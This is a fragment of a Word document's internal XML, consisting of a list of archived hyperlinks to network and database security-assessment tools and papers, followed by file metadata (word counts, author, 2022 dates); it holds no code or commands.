Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hackingvoip.com/tools/sipscan.msi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eb.archive.org/web/20200309204648/https:/addons.mozilla.org/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.nstalker.com/eng/products/nstealth/free/download.php" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.gnucitizen.org/static/blog/2008/04/hacking_zyxel_gateways_part_2.pdf" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.acunetix.com/" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/sh0dan.org/oldfiles/citrix-pab/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.databasesecurity.com/dbsec/OAK.zip" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/UNIX/audit/mysql-miner.pl" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.phenoelit.de/fr/tools.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securiteam.com/tools/6J00L0K06U.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/Passwords.htm" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.phenoelit-us.org/obiwan/docu.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/examples.oreilly.com/networksa/tools/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/wp/?page_id=16" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/tcp_scan.htm" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/security-papers.globint.com.ar/oracle_security/sql_injection_in_oracle.php" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/sipsa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6981</Words>
  <Characters>39797</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>331</Lines>
  <Paragraphs>93</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46685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Hawkins</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hunter Hawkins</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-25T23:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-25T23:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>